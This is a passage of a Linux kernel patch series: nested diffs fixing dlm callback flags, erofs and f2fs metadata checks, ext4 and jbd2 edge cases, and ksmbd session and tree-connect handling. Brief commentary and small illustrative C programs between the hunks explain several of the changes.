+-	lkb->lkb_flags &= ~DLM_IFL_CB_PENDING;
++	clear_bit(DLM_IFL_CB_PENDING_BIT, &lkb->lkb_iflags);
+ 
+ 	/* invalidate */
+ 	dlm_callback_set_last_ptr(&lkb->lkb_last_cast, NULL);
+@@ -103,10 +103,9 @@ int dlm_enqueue_lkb_callback(struct dlm_lkb *lkb, uint32_t flags, int mode,
+ 	cb->sb_status = status;
+ 	cb->sb_flags = (sbflags & 0x000000FF);
+ 	kref_init(&cb->ref);
+-	if (!(lkb->lkb_flags & DLM_IFL_CB_PENDING)) {
+-		lkb->lkb_flags |= DLM_IFL_CB_PENDING;
++	if (!test_and_set_bit(DLM_IFL_CB_PENDING_BIT, &lkb->lkb_iflags))
+ 		rv = DLM_ENQUEUE_CALLBACK_NEED_SCHED;
+-	}
++
+ 	list_add_tail(&cb->list, &lkb->lkb_callbacks);
+ 
+ 	if (flags & DLM_CB_CAST)
+@@ -209,7 +208,7 @@ void dlm_callback_work(struct work_struct *work)
+ 		spin_lock(&lkb->lkb_cb_lock);
+ 		rv = dlm_dequeue_lkb_callback(lkb, &cb);
+ 		if (rv == DLM_DEQUEUE_CALLBACK_EMPTY) {
+-			lkb->lkb_flags &= ~DLM_IFL_CB_PENDING;
++			clear_bit(DLM_IFL_CB_PENDING_BIT, &lkb->lkb_iflags);
+ 			spin_unlock(&lkb->lkb_cb_lock);
+ 			break;
+ 		}
+diff --git a/fs/dlm/dlm_internal.h b/fs/dlm/dlm_internal.h
+index ab1a55337a6eb..9bf70962bc495 100644
+--- a/fs/dlm/dlm_internal.h
++++ b/fs/dlm/dlm_internal.h
+@@ -211,7 +211,9 @@ struct dlm_args {
+ #endif
+ #define DLM_IFL_DEADLOCK_CANCEL	0x01000000
+ #define DLM_IFL_STUB_MS		0x02000000 /* magic number for m_flags */
+-#define DLM_IFL_CB_PENDING	0x04000000
++
++#define DLM_IFL_CB_PENDING_BIT	0
++
+ /* least significant 2 bytes are message changed, they are full transmitted
+  * but at receive side only the 2 bytes LSB will be set.
+  *
+@@ -246,6 +248,7 @@ struct dlm_lkb {
+ 	uint32_t		lkb_exflags;	/* external flags from caller */
+ 	uint32_t		lkb_sbflags;	/* lksb flags */
+ 	uint32_t		lkb_flags;	/* internal flags */
++	unsigned long		lkb_iflags;	/* internal flags */
+ 	uint32_t		lkb_lvbseq;	/* lvb sequence number */
+ 
+ 	int8_t			lkb_status;     /* granted, waiting, convert */
+diff --git a/fs/dlm/user.c b/fs/dlm/user.c
+index 35129505ddda1..688a480879e4b 100644
+--- a/fs/dlm/user.c
++++ b/fs/dlm/user.c
+@@ -884,7 +884,7 @@ static ssize_t device_read(struct file *file, char __user *buf, size_t count,
+ 		goto try_another;
+ 	case DLM_DEQUEUE_CALLBACK_LAST:
+ 		list_del_init(&lkb->lkb_cb_list);
+-		lkb->lkb_flags &= ~DLM_IFL_CB_PENDING;
++		clear_bit(DLM_IFL_CB_PENDING_BIT, &lkb->lkb_iflags);
+ 		break;
+ 	case DLM_DEQUEUE_CALLBACK_SUCCESS:
+ 		break;
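
Taken together, the three DLM hunks move the CB_PENDING flag from a plain
lkb_flags word into an atomic bit of the new lkb_iflags, so that setting,
testing and clearing it no longer relies on every caller holding the same
lock. A rough userspace model of test_and_set_bit()/clear_bit() built on
C11 atomics (the kernel primitives operate on unsigned long bitmaps and
carry their own memory-ordering rules, which this sketch does not model):

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

#define CB_PENDING_BIT 0

/* Atomically set the bit and return its previous value. */
static bool test_and_set_bit_ul(unsigned int bit, atomic_ulong *word)
{
	unsigned long mask = 1UL << bit;

	return atomic_fetch_or(word, mask) & mask;
}

static void clear_bit_ul(unsigned int bit, atomic_ulong *word)
{
	atomic_fetch_and(word, ~(1UL << bit));
}

int main(void)
{
	atomic_ulong iflags = 0;

	/* The first enqueue wins and must schedule the callback work... */
	if (!test_and_set_bit_ul(CB_PENDING_BIT, &iflags))
		puts("need sched");
	/* ...later enqueues see the bit already set and queue silently. */
	if (!test_and_set_bit_ul(CB_PENDING_BIT, &iflags))
		puts("never reached");

	clear_bit_ul(CB_PENDING_BIT, &iflags);
	return 0;
}
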
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index bb8501c0ff5b5..29b104754fb44 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -154,6 +154,7 @@ struct erofs_sb_info {
+ 
+ 	/* what we really care is nid, rather than ino.. */
+ 	erofs_nid_t root_nid;
++	erofs_nid_t packed_nid;
+ 	/* used for statfs, f_files - f_favail */
+ 	u64 inos;
+ 
+@@ -309,7 +310,7 @@ struct erofs_inode {
+ 
+ 	unsigned char datalayout;
+ 	unsigned char inode_isize;
+-	unsigned short xattr_isize;
++	unsigned int xattr_isize;
+ 
+ 	unsigned int xattr_shared_count;
+ 	unsigned int *xattr_shared_xattrs;
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index 626a615dafc2f..bd8bf8fc2f5df 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -381,17 +381,7 @@ static int erofs_read_superblock(struct super_block *sb)
+ #endif
+ 	sbi->islotbits = ilog2(sizeof(struct erofs_inode_compact));
+ 	sbi->root_nid = le16_to_cpu(dsb->root_nid);
+-#ifdef CONFIG_EROFS_FS_ZIP
+-	sbi->packed_inode = NULL;
+-	if (erofs_sb_has_fragments(sbi) && dsb->packed_nid) {
+-		sbi->packed_inode =
+-			erofs_iget(sb, le64_to_cpu(dsb->packed_nid));
+-		if (IS_ERR(sbi->packed_inode)) {
+-			ret = PTR_ERR(sbi->packed_inode);
+-			goto out;
+-		}
+-	}
+-#endif
++	sbi->packed_nid = le64_to_cpu(dsb->packed_nid);
+ 	sbi->inos = le64_to_cpu(dsb->inos);
+ 
+ 	sbi->build_time = le64_to_cpu(dsb->build_time);
+@@ -800,6 +790,16 @@ static int erofs_fc_fill_super(struct super_block *sb, struct fs_context *fc)
+ 
+ 	erofs_shrinker_register(sb);
+ 	/* sb->s_umount is already locked, SB_ACTIVE and SB_BORN are not set */
++#ifdef CONFIG_EROFS_FS_ZIP
++	if (erofs_sb_has_fragments(sbi) && sbi->packed_nid) {
++		sbi->packed_inode = erofs_iget(sb, sbi->packed_nid);
++		if (IS_ERR(sbi->packed_inode)) {
++			err = PTR_ERR(sbi->packed_inode);
++			sbi->packed_inode = NULL;
++			return err;
++		}
++	}
++#endif
+ 	err = erofs_init_managed_cache(sb);
+ 	if (err)
+ 		return err;
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index 98fb90b9af715..91733f8ecdffc 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -211,6 +211,10 @@ static int legacy_load_cluster_from_disk(struct z_erofs_maprecorder *m,
+ 		if (advise & Z_EROFS_VLE_DI_PARTIAL_REF)
+ 			m->partialref = true;
+ 		m->clusterofs = le16_to_cpu(di->di_clusterofs);
++		if (m->clusterofs >= 1 << vi->z_logical_clusterbits) {
++			DBG_BUGON(1);
++			return -EFSCORRUPTED;
++		}
+ 		m->pblk = le32_to_cpu(di->di_u.blkaddr);
+ 		break;
+ 	default:
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 9de1c9d1a13d3..ee5acf2bd5e67 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -5802,7 +5802,8 @@ int ext4_clu_mapped(struct inode *inode, ext4_lblk_t lclu)
+ 	 * mapped - no physical clusters have been allocated, and the
+ 	 * file has no extents
+ 	 */
+-	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
++	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA) ||
++	    ext4_has_inline_data(inode))
+ 		return 0;
+ 
+ 	/* search for the extent closest to the first block in the cluster */
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 96517785a9f89..0b87665aaff13 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -3149,6 +3149,9 @@ static int ext4_da_write_end(struct file *file,
+ 	    ext4_has_inline_data(inode))
+ 		return ext4_write_inline_data_end(inode, pos, len, copied, page);
+ 
++	if (unlikely(copied < len) && !PageUptodate(page))
++		copied = 0;
++
+ 	start = pos & (PAGE_SIZE - 1);
+ 	end = start + copied - 1;
+ 
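
Zeroing "copied" when a short copy lands in a page that is not uptodate
keeps the dirty-range bookkeeping from covering bytes that were never
actually written. The start/end computation itself is plain masking
within a page; a toy run with made-up numbers:

#include <stdio.h>

#define PAGE_SIZE 4096UL

int main(void)
{
	unsigned long pos = 2 * PAGE_SIZE + 100;	/* file offset of the write */
	unsigned long copied = 300;			/* bytes actually copied */

	unsigned long start = pos & (PAGE_SIZE - 1);	/* offset in page: 100 */
	unsigned long end = start + copied - 1;		/* last byte: 399 */

	printf("dirty range in page: [%lu, %lu]\n", start, end);
	return 0;
}
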
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 2532f369cb10f..07c96fea76fe1 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -759,7 +759,12 @@ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task)
+ 
+ 	if (dic->clen > PAGE_SIZE * dic->nr_cpages - COMPRESS_HEADER_SIZE) {
+ 		ret = -EFSCORRUPTED;
+-		f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
++
++		/* Avoid f2fs_commit_super in irq context */
++		if (in_task)
++			f2fs_save_errors(sbi, ERROR_FAIL_DECOMPRESSION);
++		else
++			f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
+ 		goto out_release;
+ 	}
+ 
+@@ -1459,6 +1464,12 @@ continue_unlock:
+ 		if (!PageDirty(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
++		if (PageWriteback(cc->rpages[i])) {
++			if (wbc->sync_mode == WB_SYNC_NONE)
++				goto continue_unlock;
++			f2fs_wait_on_page_writeback(cc->rpages[i], DATA, true, true);
++		}
++
+ 		if (!clear_page_dirty_for_io(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index a28d05895f5c7..75e59e7016590 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -873,6 +873,8 @@ void f2fs_submit_merged_ipu_write(struct f2fs_sb_info *sbi,
+ 	bool found = false;
+ 	struct bio *target = bio ? *bio : NULL;
+ 
++	f2fs_bug_on(sbi, !target && !page);
++
+ 	for (temp = HOT; temp < NR_TEMP_TYPE && !found; temp++) {
+ 		struct f2fs_bio_info *io = sbi->write_io[DATA] + temp;
+ 		struct list_head *head = &io->bio_list;
+@@ -2899,7 +2901,8 @@ out:
+ 
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+ 		f2fs_submit_merged_write(sbi, DATA);
+-		f2fs_submit_merged_ipu_write(sbi, bio, NULL);
++		if (bio && *bio)
++			f2fs_submit_merged_ipu_write(sbi, bio, NULL);
+ 		submitted = NULL;
+ 	}
+ 
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index e8953c3dc81ab..42962ee0a1179 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3576,6 +3576,7 @@ int f2fs_quota_sync(struct super_block *sb, int type);
+ loff_t max_file_blocks(struct inode *inode);
+ void f2fs_quota_off_umount(struct super_block *sb);
+ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason);
++void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag);
+ void f2fs_handle_error(struct f2fs_sb_info *sbi, unsigned char error);
+ int f2fs_commit_super(struct f2fs_sb_info *sbi, bool recover);
+ int f2fs_sync_fs(struct super_block *sb, int sync);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 05297427552ac..de92279a80020 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -2117,7 +2117,11 @@ static int f2fs_ioc_start_atomic_write(struct file *filp, bool truncate)
+ 		clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
+ 	} else {
+ 		/* Reuse the already created COW inode */
+-		f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
++		ret = f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
++		if (ret) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			goto out;
++		}
+ 	}
+ 
+ 	f2fs_write_inode(inode, NULL);
+@@ -3013,15 +3017,16 @@ int f2fs_transfer_project_quota(struct inode *inode, kprojid_t kprojid)
+ 	struct dquot *transfer_to[MAXQUOTAS] = {};
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct super_block *sb = sbi->sb;
+-	int err = 0;
++	int err;
+ 
+ 	transfer_to[PRJQUOTA] = dqget(sb, make_kqid_projid(kprojid));
+-	if (!IS_ERR(transfer_to[PRJQUOTA])) {
+-		err = __dquot_transfer(inode, transfer_to);
+-		if (err)
+-			set_sbi_flag(sbi, SBI_QUOTA_NEED_REPAIR);
+-		dqput(transfer_to[PRJQUOTA]);
+-	}
++	if (IS_ERR(transfer_to[PRJQUOTA]))
++		return PTR_ERR(transfer_to[PRJQUOTA]);
++
++	err = __dquot_transfer(inode, transfer_to);
++	if (err)
++		set_sbi_flag(sbi, SBI_QUOTA_NEED_REPAIR);
++	dqput(transfer_to[PRJQUOTA]);
+ 	return err;
+ }
+ 
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 6e2cae3d2e717..72cda2f9380f2 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1795,8 +1795,8 @@ int f2fs_gc(struct f2fs_sb_info *sbi, struct f2fs_gc_control *gc_control)
+ 				prefree_segments(sbi));
+ 
+ 	cpc.reason = __get_cp_reason(sbi);
+-	sbi->skipped_gc_rwsem = 0;
+ gc_more:
++	sbi->skipped_gc_rwsem = 0;
+ 	if (unlikely(!(sbi->sb->s_flags & SB_ACTIVE))) {
+ 		ret = -EINVAL;
+ 		goto stop;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 269f89d202c61..06991cf643296 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -246,10 +246,16 @@ retry:
+ 	} else {
+ 		blkcnt_t count = 1;
+ 
++		err = inc_valid_block_count(sbi, inode, &count);
++		if (err) {
++			f2fs_put_dnode(&dn);
++			return err;
++		}
++
+ 		*old_addr = dn.data_blkaddr;
+ 		f2fs_truncate_data_blocks_range(&dn, 1);
+ 		dec_valid_block_count(sbi, F2FS_I(inode)->cow_inode, count);
+-		inc_valid_block_count(sbi, inode, &count);
++
+ 		f2fs_replace_block(sbi, &dn, dn.data_blkaddr, new_addr,
+ 					ni.version, true, false);
+ 	}
+@@ -4951,48 +4957,6 @@ int f2fs_check_write_pointer(struct f2fs_sb_info *sbi)
+ 	return 0;
+ }
+ 
+-static bool is_conv_zone(struct f2fs_sb_info *sbi, unsigned int zone_idx,
+-						unsigned int dev_idx)
+-{
+-	if (!bdev_is_zoned(FDEV(dev_idx).bdev))
+-		return true;
+-	return !test_bit(zone_idx, FDEV(dev_idx).blkz_seq);
+-}
+-
+-/* Return the zone index in the given device */
+-static unsigned int get_zone_idx(struct f2fs_sb_info *sbi, unsigned int secno,
+-					int dev_idx)
+-{
+-	block_t sec_start_blkaddr = START_BLOCK(sbi, GET_SEG_FROM_SEC(sbi, secno));
+-
+-	return (sec_start_blkaddr - FDEV(dev_idx).start_blk) >>
+-						sbi->log_blocks_per_blkz;
+-}
+-
+-/*
+- * Return the usable segments in a section based on the zone's
+- * corresponding zone capacity. Zone is equal to a section.
+- */
+-static inline unsigned int f2fs_usable_zone_segs_in_sec(
+-		struct f2fs_sb_info *sbi, unsigned int segno)
+-{
+-	unsigned int dev_idx, zone_idx;
+-
+-	dev_idx = f2fs_target_device_index(sbi, START_BLOCK(sbi, segno));
+-	zone_idx = get_zone_idx(sbi, GET_SEC_FROM_SEG(sbi, segno), dev_idx);
+-
+-	/* Conventional zone's capacity is always equal to zone size */
+-	if (is_conv_zone(sbi, zone_idx, dev_idx))
+-		return sbi->segs_per_sec;
+-
+-	if (!sbi->unusable_blocks_per_sec)
+-		return sbi->segs_per_sec;
+-
+-	/* Get the segment count beyond zone capacity block */
+-	return sbi->segs_per_sec - (sbi->unusable_blocks_per_sec >>
+-						sbi->log_blocks_per_seg);
+-}
+-
+ /*
+  * Return the number of usable blocks in a segment. The number of blocks
+  * returned is always equal to the number of blocks in a segment for
+@@ -5005,23 +4969,13 @@ static inline unsigned int f2fs_usable_zone_blks_in_seg(
+ 			struct f2fs_sb_info *sbi, unsigned int segno)
+ {
+ 	block_t seg_start, sec_start_blkaddr, sec_cap_blkaddr;
+-	unsigned int zone_idx, dev_idx, secno;
+-
+-	secno = GET_SEC_FROM_SEG(sbi, segno);
+-	seg_start = START_BLOCK(sbi, segno);
+-	dev_idx = f2fs_target_device_index(sbi, seg_start);
+-	zone_idx = get_zone_idx(sbi, secno, dev_idx);
+-
+-	/*
+-	 * Conventional zone's capacity is always equal to zone size,
+-	 * so, blocks per segment is unchanged.
+-	 */
+-	if (is_conv_zone(sbi, zone_idx, dev_idx))
+-		return sbi->blocks_per_seg;
++	unsigned int secno;
+ 
+ 	if (!sbi->unusable_blocks_per_sec)
+ 		return sbi->blocks_per_seg;
+ 
++	secno = GET_SEC_FROM_SEG(sbi, segno);
++	seg_start = START_BLOCK(sbi, segno);
+ 	sec_start_blkaddr = START_BLOCK(sbi, GET_SEG_FROM_SEC(sbi, secno));
+ 	sec_cap_blkaddr = sec_start_blkaddr + CAP_BLKS_PER_SEC(sbi);
+ 
+@@ -5055,11 +5009,6 @@ static inline unsigned int f2fs_usable_zone_blks_in_seg(struct f2fs_sb_info *sbi
+ 	return 0;
+ }
+ 
+-static inline unsigned int f2fs_usable_zone_segs_in_sec(struct f2fs_sb_info *sbi,
+-							unsigned int segno)
+-{
+-	return 0;
+-}
+ #endif
+ unsigned int f2fs_usable_blks_in_seg(struct f2fs_sb_info *sbi,
+ 					unsigned int segno)
+@@ -5074,7 +5023,7 @@ unsigned int f2fs_usable_segs_in_sec(struct f2fs_sb_info *sbi,
+ 					unsigned int segno)
+ {
+ 	if (f2fs_sb_has_blkzoned(sbi))
+-		return f2fs_usable_zone_segs_in_sec(sbi, segno);
++		return CAP_SEGS_PER_SEC(sbi);
+ 
+ 	return sbi->segs_per_sec;
+ }
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index 6eb5922a25361..822c47fdc6e35 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -104,6 +104,9 @@ static inline void sanity_check_seg_type(struct f2fs_sb_info *sbi,
+ #define CAP_BLKS_PER_SEC(sbi)					\
+ 	((sbi)->segs_per_sec * (sbi)->blocks_per_seg -		\
+ 	 (sbi)->unusable_blocks_per_sec)
++#define CAP_SEGS_PER_SEC(sbi)					\
++	((sbi)->segs_per_sec - ((sbi)->unusable_blocks_per_sec >>\
++	(sbi)->log_blocks_per_seg))
+ #define GET_SEC_FROM_SEG(sbi, segno)				\
+ 	(((segno) == -1) ? -1: (segno) / (sbi)->segs_per_sec)
+ #define GET_SEG_FROM_SEC(sbi, secno)				\
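
The new CAP_SEGS_PER_SEC mirrors CAP_BLKS_PER_SEC above: it converts the
section's unusable blocks (zone size minus zone capacity) into whole
segments and subtracts them from segs_per_sec. A quick check of the shift
arithmetic with invented geometry:

#include <stdio.h>

int main(void)
{
	unsigned int segs_per_sec = 4;			/* hypothetical layout */
	unsigned int log_blocks_per_seg = 9;		/* 512 blocks per segment */
	unsigned int unusable_blocks_per_sec = 1024;	/* zone cap 2 segs short */

	unsigned int cap_segs = segs_per_sec -
		(unusable_blocks_per_sec >> log_blocks_per_seg);

	printf("usable segments per section: %u\n", cap_segs);	/* prints 2 */
	return 0;
}
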
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 551468dad3275..3711445a2489b 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -3895,7 +3895,7 @@ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason)
+ 	f2fs_up_write(&sbi->sb_lock);
+ }
+ 
+-static void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag)
++void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag)
+ {
+ 	spin_lock(&sbi->error_lock);
+ 	if (!test_bit(flag, (unsigned long *)sbi->errors)) {
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index 088b816127ecb..2884efe5269ed 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -564,9 +564,9 @@ out:
+ 	if (!strcmp(a->attr.name, "iostat_period_ms")) {
+ 		if (t < MIN_IOSTAT_PERIOD_MS || t > MAX_IOSTAT_PERIOD_MS)
+ 			return -EINVAL;
+-		spin_lock(&sbi->iostat_lock);
++		spin_lock_irq(&sbi->iostat_lock);
+ 		sbi->iostat_period_ms = (unsigned int)t;
+-		spin_unlock(&sbi->iostat_lock);
++		spin_unlock_irq(&sbi->iostat_lock);
+ 		return count;
+ 	}
+ #endif
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 15de1385012eb..18611241f4513 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -2387,6 +2387,9 @@ static int journal_unmap_buffer(journal_t *journal, struct buffer_head *bh,
+ 			spin_unlock(&jh->b_state_lock);
+ 			write_unlock(&journal->j_state_lock);
+ 			jbd2_journal_put_journal_head(jh);
++			/* Already zapped buffer? Nothing to do... */
++			if (!bh->b_bdev)
++				return 0;
+ 			return -EBUSY;
+ 		}
+ 		/*
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index cead696b656a8..df8fb076f6f14 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -221,22 +221,22 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ {
+ 	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+ 	char ntlmv2_rsp[CIFS_HMAC_MD5_HASH_SIZE];
+-	struct ksmbd_crypto_ctx *ctx;
++	struct ksmbd_crypto_ctx *ctx = NULL;
+ 	char *construct = NULL;
+ 	int rc, len;
+ 
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+ 	rc = calc_ntlmv2_hash(conn, sess, ntlmv2_hash, domain_name);
+ 	if (rc) {
+ 		ksmbd_debug(AUTH, "could not get v2 hash rc %d\n", rc);
+ 		goto out;
+ 	}
+ 
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
+ 	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+ 				 ntlmv2_hash,
+ 				 CIFS_HMAC_MD5_HASH_SIZE);
+@@ -272,6 +272,8 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
+ 		goto out;
+ 	}
++	ksmbd_release_crypto_ctx(ctx);
++	ctx = NULL;
+ 
+ 	rc = ksmbd_gen_sess_key(sess, ntlmv2_hash, ntlmv2_rsp);
+ 	if (rc) {
+@@ -282,7 +284,8 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 	if (memcmp(ntlmv2->ntlmv2_hash, ntlmv2_rsp, CIFS_HMAC_MD5_HASH_SIZE) != 0)
+ 		rc = -EINVAL;
+ out:
+-	ksmbd_release_crypto_ctx(ctx);
++	if (ctx)
++		ksmbd_release_crypto_ctx(ctx);
+ 	kfree(construct);
+ 	return rc;
+ }
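
The reordering above narrows the lifetime of the HMAC-MD5 context: it is
allocated only after calc_ntlmv2_hash() has succeeded and released as soon
as the response hash is computed, so failure paths no longer free a
context that was never used. The general shape, sketched in plain C with
malloc/free standing in for the crypto-context helpers (all names here
are illustrative):

#include <stdlib.h>

struct ctx { int dummy; };

static struct ctx *ctx_get(void) { return malloc(sizeof(struct ctx)); }
static void ctx_put(struct ctx *c) { free(c); }

static int compute_hash(void) { return 0; /* pretend success */ }

static int authenticate(void)
{
	struct ctx *ctx = NULL;
	int rc;

	/* Fail cheaply first: no context has been allocated yet. */
	rc = compute_hash();
	if (rc)
		goto out;

	ctx = ctx_get();
	if (!ctx)
		return -12;	/* -ENOMEM, mirroring the early return above */

	/* ... use ctx ... */

	/* Release as soon as we are done, not at function exit. */
	ctx_put(ctx);
	ctx = NULL;

	/* ... remaining work that no longer needs ctx ... */
out:
	if (ctx)
		ctx_put(ctx);
	return rc;
}

int main(void)
{
	return authenticate() ? 1 : 0;
}
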
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+index 8ce17b3fb8dad..f19de20c2960c 100644
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ b/fs/ksmbd/mgmt/tree_connect.c
+@@ -109,7 +109,15 @@ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+ 						  unsigned int id)
+ {
+-	return xa_load(&sess->tree_conns, id);
++	struct ksmbd_tree_connect *tcon;
++
++	tcon = xa_load(&sess->tree_conns, id);
++	if (tcon) {
++		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
++			tcon = NULL;
++	}
++
++	return tcon;
+ }
+ 
+ struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+diff --git a/fs/ksmbd/mgmt/tree_connect.h b/fs/ksmbd/mgmt/tree_connect.h
+index 0f97ddc1e39c0..700df36cf3e30 100644
+--- a/fs/ksmbd/mgmt/tree_connect.h
++++ b/fs/ksmbd/mgmt/tree_connect.h
+@@ -14,6 +14,8 @@ struct ksmbd_share_config;
+ struct ksmbd_user;
+ struct ksmbd_conn;
+ 
++#define TREE_CONN_EXPIRE		1
++
+ struct ksmbd_tree_connect {
+ 	int				id;
+ 
+@@ -25,6 +27,7 @@ struct ksmbd_tree_connect {
+ 
+ 	int				maximal_access;
+ 	bool				posix_extensions;
++	unsigned long			status;
+ };
+ 
+ struct ksmbd_tree_conn_status {
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index 0d8242789dc8f..cd8a873347a79 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -606,6 +606,7 @@ err_unregister:
+ static void __exit ksmbd_server_exit(void)
+ {
+ 	ksmbd_server_shutdown();
++	rcu_barrier();
+ 	ksmbd_release_inode_hash();
+ }
+ 
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 32a837014cbfc..decaef3592f43 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -1456,7 +1456,7 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 		 * Reuse session if anonymous try to connect
+ 		 * on reauthentication.
+ 		 */
+-		if (ksmbd_anonymous_user(user)) {
++		if (conn->binding == false && ksmbd_anonymous_user(user)) {
+ 			ksmbd_free_user(user);
+ 			return 0;
+ 		}
+@@ -1470,7 +1470,7 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 		sess->user = user;
+ 	}
+ 
+-	if (user_guest(sess->user)) {
++	if (conn->binding == false && user_guest(sess->user)) {
+ 		rsp->SessionFlags = SMB2_SESSION_FLAG_IS_GUEST_LE;
+ 	} else {
+ 		struct authenticate_message *authblob;
+@@ -1715,6 +1715,11 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			goto out_err;
+ 		}
+ 
++		if (user_guest(sess->user)) {
++			rc = -EOPNOTSUPP;
++			goto out_err;
++		}
++
+ 		conn->binding = true;
+ 	} else if ((conn->dialect < SMB30_PROT_ID ||
+ 		    server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+@@ -1801,6 +1806,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				}
+ 				kfree(sess->Preauth_HashValue);
+ 				sess->Preauth_HashValue = NULL;
++			} else {
++				pr_info_ratelimited("Unknown NTLMSSP message type : 0x%x\n",
++						le32_to_cpu(negblob->MessageType));
++				rc = -EINVAL;
+ 			}
+ 		} else {
+ 			/* TODO: need one more negotiation */
+@@ -1823,6 +1832,8 @@ out_err:
+ 		rsp->hdr.Status = STATUS_NETWORK_SESSION_EXPIRED;
+ 	else if (rc == -ENOMEM)
+ 		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++	else if (rc == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+ 	else if (rc)
+ 		rsp->hdr.Status = STATUS_LOGON_FAILURE;
+ 
+@@ -2055,11 +2066,12 @@ int smb2_tree_disconnect(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	if (!tcon) {
++	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
+ 		struct smb2_tree_disconnect_req *req =
+ 			smb2_get_msg(work->request_buf);
+ 
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
++
